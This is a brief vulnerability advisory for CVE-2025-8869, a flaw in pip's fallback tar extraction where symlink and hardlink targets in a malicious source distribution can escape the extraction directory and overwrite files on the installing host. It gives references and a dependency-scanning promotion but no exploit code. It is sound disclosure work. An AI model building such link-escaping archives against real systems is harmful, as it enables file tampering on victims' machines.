CVE-2025-8869: pip's fallback tar extraction doesn't check symbolic links point to extraction directory
(updated )
In the fallback extraction path for source distributions, pip used Python’s tarfile module without verifying that symbolic/hard link targets resolve inside the intended extraction directory. A malicious sdist can include links that escape the target directory and overwrite arbitrary files on the invoking host during pip install.
References
- github.com/advisories/GHSA-4xh5-x5gv-qwph
- github.com/pypa/pip
- github.com/pypa/pip/commit/f2b92314da012b9fffa36b3f3e67748a37ef464a
- github.com/pypa/pip/pull/13550
- mail.python.org/archives/list/security-announce@python.org/thread/IF5A3GCJY3VH7BVHJKOWOJFKTW7VFQEN
- nvd.nist.gov/vuln/detail/CVE-2025-8869
- pip.pypa.io/en/stable/news/
Code Behaviors & Features
Detect and mitigate CVE-2025-8869 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →